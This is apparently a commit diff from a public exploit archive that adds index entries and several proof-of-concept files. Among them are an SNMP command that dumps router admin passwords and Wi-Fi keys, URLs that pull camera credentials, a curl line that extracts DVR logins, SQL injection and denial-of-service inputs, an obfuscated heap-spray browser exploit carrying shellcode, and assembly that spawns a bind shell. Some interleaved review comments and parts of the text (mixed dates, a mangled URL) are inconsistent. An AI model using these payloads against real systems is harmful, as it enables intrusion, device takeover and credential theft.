DB: 2015-09-21
9 new exploits
parent
828e9ae3d0
commit
c6421d54c9
11 changed files with 640 additions and 2 deletions
13
files.csv
13
files.csv
|
@ -472,7 +472,7 @@ id,file,description,date,author,platform,type,port
|
|||
609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0
|
||||
611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
|
||||
612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
|
||||
616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit (1)",2004-11-07,class101,windows,remote,80
|
||||
616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
|
||||
618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
|
||||
619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
|
||||
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25
|
||||
|
@ -488,7 +488,7 @@ id,file,description,date,author,platform,type,port
|
|||
631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0
|
||||
634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0
|
||||
635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
|
||||
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (2)",2004-11-16,NoPh0BiA,windows,remote,80
|
||||
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,80
|
||||
637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
|
||||
638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
|
||||
640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
|
||||
|
@ -34535,3 +34535,12 @@ id,file,description,date,author,platform,type,port
|
|||
38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
|
||||
38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
|
||||
38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
|
||||
38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
|
||||
38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
|
||||
38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
|
||||
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
|
||||
38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
|
||||
38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
|
||||
38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
|
||||
38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
|
||||
38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
|
||||
|
|
|
76
platforms/hardware/remote/38242.txt
Executable file
76
platforms/hardware/remote/38242.txt
Executable file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
|
||||
[MODEL: DWG849] Cable Modem Gateway
|
||||
# Google Dork: n/a
|
||||
# Date: 09/18/2015
|
||||
# Exploit Author: Matt Dunlap
|
||||
# Vendor Homepage:
|
||||
http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
|
||||
# Software Link: n/a
|
||||
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
|
||||
2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
|
||||
# Tested on: Ubuntu 14.04.3
|
||||
# CVE : Not reported to vendor (yet)
|
||||
|
||||
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
|
||||
Cable Modem Gateway
|
||||
|
||||
Affected Product:
|
||||
|
||||
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
|
||||
|
||||
NOTE: The model DWG850-4 is open to the same attack but doesn’t come with
|
||||
the remote administration enabled (no web interface, no telnet)
|
||||
|
||||
Severity Rating:
|
||||
|
||||
Important
|
||||
|
||||
Impact:
|
||||
|
||||
Username and password for the user interface as well as wireless network
|
||||
keys can be disclosed through SNMP.
|
||||
|
||||
At the time of posting this there are 61,505 results on Shodan for this
|
||||
model.
|
||||
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
|
||||
|
||||
The default password of 4GIt3M has been set on every unit I’ve tested so far
|
||||
|
||||
Description:
|
||||
|
||||
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
|
||||
specifications include SNMP v2 & v3 under Network Management. The
|
||||
management information bases (MIBs) of various device subsystems on the
|
||||
DWG849 allows local\remote network users to discover user interface
|
||||
credentials and wireless network key values through simple SNMP requests
|
||||
for the value of these variables. Given the security authentication in
|
||||
SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
|
||||
risk that the values can be disclosed through SNMP using the default
|
||||
read-only community “private”.
|
||||
|
||||
Object Identifiers (OIDs):
|
||||
|
||||
Make, Model, Software Version:
|
||||
1.3.6.1.2.1.1.1.0
|
||||
1.3.6.1.2.1.1.3.0
|
||||
|
||||
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
|
||||
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
|
||||
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
|
||||
|
||||
SSID and KEY
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
|
||||
|
||||
Guest Network OIDs
|
||||
Other OIDs of interest include
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
|
||||
|
||||
[POC]
|
||||
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
|
||||
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
|
||||
|
||||
This issue has not been reported to the vendor.
|
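Review bot: The default web-interface password is given in two different forms, on L221 and again on L276 (the L276 value carries an extra prefix the L221 value lacks); one of them is presumably a typo and the advisory should state which value was actually observed. The text also never says what a device owner can do about it — the disclosure path relies on SNMPv2c with the default read-only community (L255), so a line under "Severity Rating" such as `Mitigation: disable SNMPv1/v2c in favour of SNMPv3 authPriv, restrict UDP/161 to the management network, and change the default community string and admin password` would round the advisory out. The "# CVE" header (L156) and the closing line (L329) agree that the vendor has not been contacted, which is worth repeating beside the severity rating since it means no vendor fix exists at time of publication.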
148
platforms/hardware/webapps/38245.txt
Executable file
148
platforms/hardware/webapps/38245.txt
Executable file
|
@ -0,0 +1,148 @@
|
|||
1. *Advisory Information*
|
||||
|
||||
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
|
||||
Date published: 2015-09-19
|
||||
Date of last update: 2015-09-19
|
||||
Vendors contacted: ADH-Web
|
||||
Author: Glaysson dos Santos
|
||||
Release mode: User release
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Information Exposure [CWE-200]
|
||||
Impact: Security bypass
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: No
|
||||
CVE Name:
|
||||
|
||||
3. *Vulnerabilities*
|
||||
|
||||
3.1 ADH-Web Server IP-Cameras Improper Access Restrictions
|
||||
|
||||
3.1.1 Description
|
||||
|
||||
Due to improper access restriction the ADH-Web (item 4) device [1] allows a
|
||||
remote attacker to browse and access arbitrary files from the following
|
||||
directorie '/hdd0/logs'. you can also get numerous information
|
||||
(important for a fingerprint step) via the parameter "variable" in
|
||||
variable.cgi script.
|
||||
|
||||
3.1.2 Vulnerability Details
|
||||
|
||||
Usually this directory can be protected against
|
||||
unauthenticated access (401 Unauthorized), though, it can access all files
|
||||
directly without requiring authentication.As in the statement below:
|
||||
|
||||
[401]
|
||||
. 'http://<target_ip>/hdd0/logs'
|
||||
[200]
|
||||
. 'http://<target_ip>/hdd0/logs/log.txt'
|
||||
|
||||
Most common logfiles:
|
||||
|
||||
. 'bak.txt
|
||||
. 'connect.txt'
|
||||
. 'log.txt'
|
||||
. 'seclog.log'
|
||||
. 'startup.txt'
|
||||
. 'DBGLOG.TXT'
|
||||
. 'access.txt'
|
||||
. 'security.txt'
|
||||
|
||||
3.1.3 Impact
|
||||
|
||||
This could allow a remote attacker to obtain valuable information such as
|
||||
access credentials, Network configuration and other sensitive information
|
||||
in plain text.
|
||||
|
||||
Another problem identified is an information exposure via the parameter
|
||||
"variable" in variable.cgi script. Knowing some variables can extract a
|
||||
reasonable amount of information. For exemplo:
|
||||
|
||||
* DNS
|
||||
. 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'
|
||||
|
||||
* ftp master ftp console credenthials ((the development team said that this
|
||||
credential is not used, then why does it exist?):
|
||||
. '
|
||||
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
|
||||
'
|
||||
. '
|
||||
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
|
||||
'
|
||||
|
||||
(although the vast majority of servers have ftp / telnet with anonymous
|
||||
access allowed.)
|
||||
|
||||
* alarms
|
||||
. 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
|
||||
* camconfig
|
||||
. 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
|
||||
(includes, but is not limited to) There are a lot of variables [an audit
|
||||
tool is on the way].
|
||||
|
||||
This servers also sends credentials (and other sensitive data) via GET
|
||||
parameters
|
||||
This is poor practice as the URL is liable to be logged in any number of
|
||||
places
|
||||
between the customer and the camera. The credentials should be passed in
|
||||
the body
|
||||
of a POST request (under SSL of course, here is not the case). .
|
||||
(Is possible to create, edit and delete users and other configurations in
|
||||
this way, dangerous)
|
||||
|
||||
4. *Vulnerable Products and Packages*
|
||||
|
||||
. The following products are affected:
|
||||
- SD Advanced Closed IPTV
|
||||
- SD Advanced
|
||||
- EcoSense
|
||||
- Digital Sprite 2
|
||||
Other products/models are probably affected too, but they I not checked.
|
||||
|
||||
5. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
The vendor found that some things are not vulnerabilities (sensitive
|
||||
information via GET, for example)
|
||||
and others are useless (hardcoded credentials) and others are not yet so
|
||||
critical (access to server logs).
|
||||
I think that at least this information can assist during an intrusion test,
|
||||
as will be shown soon.
|
||||
|
||||
6. *Credits*
|
||||
This vulnerability was discovered by Glaysson dos Santos.
|
||||
|
||||
7. *Report Timeline*
|
||||
|
||||
. 2015-08-31:
|
||||
Vendor has been notified about the vulnerabilities (without details yet).
|
||||
|
||||
. 2015-09-01:
|
||||
Vendor acknowledges the receipt of the email and asks for technical
|
||||
details.
|
||||
|
||||
. 2013-09-01:
|
||||
A email with technical details is sent to vendor.
|
||||
|
||||
. 2013-09-11:
|
||||
Still no response, another email was sent to the Vendor requesting any
|
||||
opinion on the reported problems.
|
||||
|
||||
the following points were highlighted in this email:
|
||||
* 1. No unauthenticated access [No web pages/URL parameters on the cameras
|
||||
should be accessible without credentials.]
|
||||
* 2. Credentials (and other sensitive data) via GET parameters
|
||||
* 4. Use of hard-coded password
|
||||
* 3. no SSL
|
||||
|
||||
. 2013-09-11:
|
||||
The vendor reported that the matter was passed on to the team developed
|
||||
and that it would contact me the following week (2015-09-14).
|
||||
|
||||
. 2013-09-14:
|
||||
The development team responded by passing its consideration of the points
|
||||
and
|
||||
reported in accordance with this response the impact of these
|
||||
vulnerabilities
|
||||
is low and are no longer available unauthenticated using recent software
|
||||
release (version 10212).
|
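Review bot: The report timeline dates are internally inconsistent: the first two entries (L662, L670) are 2015-09 but the following ones at L681, L689, L720 and L731 read 2013-09-xx even though they narrate events after the 2015-08-31 notification and L726 itself refers to 2015-09-14; these look like typos for 2015 and should be corrected so the disclosure window can be read off the timeline. The numbered list at L703-L715 is also out of order (1, 2, 4, 3). The one remediation statement in the file — that the unauthenticated access is no longer available from software release 10212 (L746-L749) — is buried in the last timeline entry; it belongs under section 5 "Vendor Information, Solutions and Workarounds" (L624), which currently names no fixed version.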
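--- a/platforms/multiple/dos/38249.txt
+++ b/platforms/multiple/dos/38249.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/57602/info
+
+MiniUPnP is prone to multiple denial-of-service vulnerabilities.
+
+Attackers can exploit these issues to cause denial-of-service conditions.
+
+MiniUPnP versions prior to 1.4 are vulnerable.
+
+M-SEARCH * HTTP/1.1
+Host:239.255.255.250:1900
+ST:uuid:schemas:device:MX:3< no CRLF >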
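--- a/platforms/multiple/remote/38248.txt
+++ b/platforms/multiple/remote/38248.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57579/info
+
+Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
+
+Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
+
+curl -v http://www.example.com/DVR.cfg | strings |grep -i USER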
248
platforms/multiple/remote/38250.html
Executable file
248
platforms/multiple/remote/38250.html
Executable file
|
@ -0,0 +1,248 @@
|
|||
source: http://www.securityfocus.com/bid/57657/info
|
||||
|
||||
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
|
||||
|
||||
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
|
||||
|
||||
The following versions are vulnerable:
|
||||
|
||||
Versions prior to 8.0.3 Hot Patch 2
|
||||
Versions prior to GroupWise 2012 SP1 Hot Patch 1
|
||||
|
||||
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
|
||||
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
|
||||
<html>
|
||||
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
|
||||
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
|
||||
<script language='javascript'>
|
||||
|
||||
function GyGguPonxZoADbtgXPS() {
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
|
||||
|
||||
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
|
||||
this.heapBase = (heapBase ? heapBase : 0x150000);
|
||||
this.KJZFzfumaV = "AAAA";
|
||||
|
||||
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
|
||||
this.KJZFzfumaV += this.KJZFzfumaV;
|
||||
}
|
||||
this.mem = new Array();
|
||||
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
|
||||
void(Math.atan2(0xbabe, msg));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
|
||||
|
||||
if (enable == true)
|
||||
void(Math.atan(0xbabe));
|
||||
else
|
||||
void(Math.asin(0xbabe));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
|
||||
void(Math.acos(0xbabe));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
|
||||
if (len > this.KJZFzfumaV.length)
|
||||
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
|
||||
|
||||
return this.KJZFzfumaV.substr(0, len);
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
|
||||
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
|
||||
throw "Round argument cannot be 0";
|
||||
|
||||
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
|
||||
{
|
||||
var digits = "0123456789ABCDEF";
|
||||
|
||||
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
|
||||
|
||||
while (num > 0xF) {
|
||||
num = num >>> 4;
|
||||
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
|
||||
}
|
||||
|
||||
var width = (width ? width : 0);
|
||||
|
||||
while (beTBwoiJGBBhwyZg.length < width)
|
||||
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
|
||||
|
||||
return beTBwoiJGBBhwyZg;
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
|
||||
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
|
||||
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Allocation size " + size + " must be a multiple of 16";
|
||||
if (this.mem[tag] === undefined)
|
||||
this.mem[tag] = new Array();
|
||||
|
||||
if (typeof arg == "string" || arg instanceof String) {
|
||||
this.mem[tag].push(arg.substr(0, arg.length));
|
||||
}
|
||||
else {
|
||||
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
|
||||
}
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
|
||||
|
||||
delete this.mem[tag];
|
||||
CollectGarbage();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
|
||||
|
||||
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
|
||||
|
||||
this.SWc("oleaut32");
|
||||
|
||||
for (var i = 0; i < 6; i++) {
|
||||
this.nPdkLCpaz(32, "oleaut32");
|
||||
this.nPdkLCpaz(64, "oleaut32");
|
||||
this.nPdkLCpaz(256, "oleaut32");
|
||||
this.nPdkLCpaz(32768, "oleaut32");
|
||||
}
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
|
||||
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if (size == 32 || size == 64 || size == 256 || size == 32768)
|
||||
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
|
||||
this.nPdkLCpaz(arg, tag);
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
|
||||
this.SWc(tag);
|
||||
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
|
||||
|
||||
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
|
||||
CollectGarbage();
|
||||
|
||||
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
|
||||
|
||||
var count = (count ? count : 1);
|
||||
|
||||
for (var i = 0; i < count; i++) {
|
||||
this.uYiBaSLpjlOJJdhFAb(arg);
|
||||
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
|
||||
}
|
||||
this.uYiBaSLpjlOJJdhFAb(arg);
|
||||
|
||||
this.K("ZsJjplNR");
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
|
||||
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Allocation size " + size + " must be a multiple of 16";
|
||||
|
||||
if (size+8 >= 1024)
|
||||
throw("Maximum WbjLbPsZ block size is 1008 bytes");
|
||||
|
||||
var count = (count ? count : 1);
|
||||
|
||||
for (var i = 0; i < count; i++)
|
||||
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
|
||||
|
||||
this.K("WbjLbPsZ");
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
|
||||
{
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Allocation size " + size + " must be a multiple of 16";
|
||||
|
||||
if (size+8 >= 1024)
|
||||
throw("Maximum WbjLbPsZ block size is 1008 bytes");
|
||||
|
||||
return this.heapBase + 0x688 + ((size+8)/8)*48;
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
|
||||
|
||||
var size = (size ? size : 1008);
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Vtable size " + size + " must be a multiple of 16";
|
||||
|
||||
if (shellcode.length*2 > size-138)
|
||||
throw("Maximum shellcode length is " + (size-138) + " bytes");
|
||||
|
||||
var udIUhjCc = unescape("%u9090%u7ceb")
|
||||
|
||||
for (var i = 0; i < 124/4; i++)
|
||||
udIUhjCc += this.RBRfbU(jmpecx);
|
||||
|
||||
udIUhjCc += unescape("%u0028%u0028") +
|
||||
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
|
||||
|
||||
return udIUhjCc;
|
||||
}
|
||||
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
|
||||
var payload2 = unescape(
|
||||
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
|
||||
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
|
||||
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
|
||||
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
|
||||
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
|
||||
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
|
||||
"");
|
||||
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
|
||||
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
|
||||
|
||||
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
|
||||
|
||||
offset_length = 0x5F6;
|
||||
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
|
||||
|
||||
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
|
||||
var block = shellcode.substring(2, 0x40000 - 0x21);
|
||||
for (var i=0; i < 250; i++) {
|
||||
heap_obj.uYiBaSLpjlOJJdhFAb(block);
|
||||
}
|
||||
ctrl.InvokeContact(202116108)
|
||||
</script>
|
||||
</html>
|
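Review bot: The advisory text at the top of the file (L826-L849) lists the fixed GroupWise versions but gives nothing for systems that cannot upgrade; since the vulnerable code path is reached through an ActiveX control instantiated by CLSID on L866, the standard defender-side interim mitigation — setting the kill-bit for that CLSID, or disabling ActiveX for the Internet zone — is worth stating next to the version list. As a point of style, the test environment (Windows XP SP3, IE 8, DEP disabled, L857) is recorded only as a bare HTML comment after the prose; those preconditions belong in the header block alongside the `source:` line so a reader sees them before the markup. The enclosing `<script>` block runs from L869 to L1501 within this section.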
|
@ -65,6 +65,21 @@ start:
|
|||
add r12b, 0x3c ;RAX = 0x000000000200005a dup2
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
inc rsi
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
xor rsi,rsi ;zero out RSI
|
||||
push rsi ;push NULL on stack
|
||||
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
|
||||
push rdi ;push rdi to the stack
|
||||
mov rdi, rsp ;store RSP (points to the command string) in RDI
|
||||
xor rdx, rdx ;zero out RDX
|
||||
|
||||
sub r12b, 0x1f ;RAX = 0x000000000200003b execve
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall ;trigger syscall
|
||||
|
||||
/*
|
||||
$ nasm -f bin bind-shellcode.asm
|
||||
|
|
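--- a/platforms/php/webapps/38246.txt
+++ b/platforms/php/webapps/38246.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57564/info
+
+iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/forum/icart.php?do=editproduct&productid=19§ion='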
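Review bot: The PoC URL on L1601 reads `§ion=`, which is what an `&sect` prefix becomes when a renderer decodes it as an HTML entity; the index entry for this file (L94) names the `section` parameter, so the committed bytes and the rendered page appear to disagree. Worth checking the file as stored against the index description, since the two should name the same parameter.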
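--- a/platforms/php/webapps/38251.txt
+++ b/platforms/php/webapps/38251.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57664/info
+
+The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
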